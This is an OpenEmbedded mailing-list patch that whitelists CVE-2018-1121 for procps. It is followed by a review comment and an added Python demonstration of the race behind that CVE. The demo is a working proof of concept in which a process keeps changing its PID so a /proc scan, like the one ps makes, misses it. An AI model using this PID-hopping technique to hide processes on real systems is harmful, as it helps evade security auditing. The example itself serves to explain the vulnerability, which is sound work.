From patchwork Wed Nov 6 15:37:55 2019
X-Patchwork-Submitter: Mikko Rapeli
X-Patchwork-Id: 178735
From: Mikko Rapeli
To: openembedded-core@lists.openembedded.org
Date: Wed, 6 Nov 2019 17:37:55 +0200
Message-Id: <340de0c1062a72149b6b3b399215bafa61a52562.1573047195.git.mikko.rapeli@bmw.de>
X-Mailer: git-send-email 2.1.4
Subject: [OE-core] [PATCH RFC CFH][sumo 40/47] procps: whitelist CVE-2018-1121
List-Id: Patches and discussions about the oe-core layer

From: Ross Burton

This CVE is about race conditions in 'ps' which make it unsuitable for
security audits. As these race conditions are unavoidable, ps shouldn't be
used for security auditing, so this isn't a valid CVE.

(From OE-Core rev: b3fa0654abf9ac32f683ac174e453ea5e64b6cb8)

Signed-off-by: Ross Burton
Signed-off-by: Richard Purdie

Conflicts:
	meta/recipes-extended/procps/procps_3.3.15.bb
---
 meta/recipes-extended/procps/procps_3.3.12.bb | 3 +++
 1 file changed, 3 insertions(+)

-- 
1.9.1

diff --git a/meta/recipes-extended/procps/procps_3.3.12.bb b/meta/recipes-extended/procps/procps_3.3.12.bb
index 6e15b0a..d4ebaf9 100644
--- a/meta/recipes-extended/procps/procps_3.3.12.bb
+++ b/meta/recipes-extended/procps/procps_3.3.12.bb
@@ -64,3 +64,6 @@ python __anonymous() { d.setVarFlag('ALTERNATIVE_LINK_NAME', prog, '%s/%s' % (d.getVar('base_sbindir'), prog)) } +# 'ps' isn't suitable for use as a security tool so whitelist this CVE. +# https://bugzilla.redhat.com/show_bug.cgi?id=1575473#c3 +CVE_CHECK_WHITELIST += "CVE-2018-1121"
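Review bot: the added `CVE_CHECK_WHITELIST += "CVE-2018-1121"` line only does anything if the sumo cve-check.bbclass actually reads CVE_CHECK_WHITELIST; that list-style variable came with a later cve-check rework than the class sumo originally shipped, so this backport should either be ordered after the cve-check backport in the same series or say in the commit message which cve-check change it depends on, otherwise the CVE keeps being reported and the line is a silent no-op. The comment above the line would also be more useful to whoever next bumps the recipe if it said why this is unfixable rather than only pointing at a bugzilla comment, e.g. `# 'ps' enumerates /proc non-atomically, so this race is inherent to the tool; whitelist this CVE.`, since the Conflicts line shows the same whitelist has already had to be carried across from procps_3.3.15.bb and a future version bump is the likely place for it to get lost.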
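The race the commit message refers to can be seen with a direct /proc scan. What follows is an added example, not procps-ng code and not part of this patch: it reproduces the two-phase readdir-then-open pass that ps makes over procfs and, while the scan runs, keeps a child process hopping between PIDs so that the PID the scan listed is gone by the time it is opened while the live PID was never listed. It assumes Linux with procfs mounted at /proc and a kernel that supports PR_SET_CHILD_SUBREAPER; the comm name "hideme" and the 0.3 s hop window are arbitrary choices for the demo.

```python
"""Why a readdir-then-open scan of /proc is never an atomic view of the
process table: the window between listing a PID and reading it can be
exploited by a process that keeps changing its own PID.

Added example (not procps-ng or OE-Core code).  Assumes Linux, procfs at
/proc and permission to fork.  Names and timings are made up for the demo.
"""
import ctypes
import ctypes.util
import os
import time

PR_SET_NAME = 15                 # prctl(2) constants from linux/prctl.h
PR_SET_CHILD_SUBREAPER = 36
_libc = ctypes.CDLL(ctypes.util.find_library("c") or None, use_errno=True)


def _prctl(option, arg):
    if _libc.prctl(option, arg, 0, 0, 0) != 0:
        raise OSError(ctypes.get_errno(), "prctl failed")


def snapshot_proc(proc_root="/proc"):
    """One ps-style pass over procfs.

    Phase 1 lists the numeric directory entries; phase 2 reads
    /proc/PID/comm for each.  Returns (seen, vanished): seen maps PID to
    comm for entries that were still readable, vanished lists PIDs that
    were present in phase 1 but gone by phase 2.  Nothing in the kernel
    makes the two phases one atomic operation.
    """
    pids = sorted(int(p) for p in os.listdir(proc_root) if p.isdigit())
    seen, vanished = {}, []
    for pid in pids:
        try:
            with open(f"{proc_root}/{pid}/comm") as f:
                seen[pid] = f.read().strip()
        except OSError:          # ENOENT/ESRCH: exited between the phases
            vanished.append(pid)
    return seen, vanished


def _pid_hopper(name, deadline):
    """Child body: rename ourselves, then keep forking and letting the
    parent exit so the live copy always sits on a PID newer than any the
    scan listed.  comm is inherited across fork(), so every hop keeps it."""
    _prctl(PR_SET_NAME, name.encode())
    try:
        while time.monotonic() < deadline:
            if os.fork() != 0:
                os._exit(0)      # parent dies, freeing its PID; child carries on
    except OSError:
        pass                     # fork limit hit: just stop hopping
    os._exit(0)


def run_demo(hop_seconds=0.3, name="hideme"):
    """Start a PID-hopping child, scan /proc while it runs, then reap every
    generation it left behind and report what the scan saw."""
    _prctl(PR_SET_CHILD_SUBREAPER, 1)      # orphaned hops reparent to us, not init
    deadline = time.monotonic() + hop_seconds
    if os.fork() == 0:
        _pid_hopper(name, deadline)        # never returns
    time.sleep(0.02)                       # let the hopper get going
    seen, vanished = snapshot_proc()
    # Wait for the chain to finish, then reap all generations so none leak.
    time.sleep(max(0.0, deadline - time.monotonic()) + 0.05)
    try:
        while True:
            os.waitpid(-1, 0)
    except ChildProcessError:
        pass
    with open("/proc/self/comm") as f:
        own_comm = f.read().strip()
    return {
        "self_seen": seen.get(os.getpid()) == own_comm,   # a stable process is seen
        "listed": len(seen) + len(vanished),
        "vanished": len(vanished),
        "hider_seen": name in seen.values(),              # timing-dependent
    }


if __name__ == "__main__":
    r = run_demo()
    print(f"listed {r['listed']} PIDs, {r['vanished']} vanished mid-scan, "
          f"hider {'visible' if r['hider_seen'] else 'not visible'}")
```

Run it a few times: whether the hopper shows up at all depends on timing, which is the point. No amount of care inside a tool that reads /proc turns the listing and the per-PID reads into one atomic operation, so a check that must not miss a process needs a kernel-side source such as the audit subsystem rather than a procfs scan. The subreaper prctl is only there so the orphaned hops are reparented to the demo and reaped when it finishes.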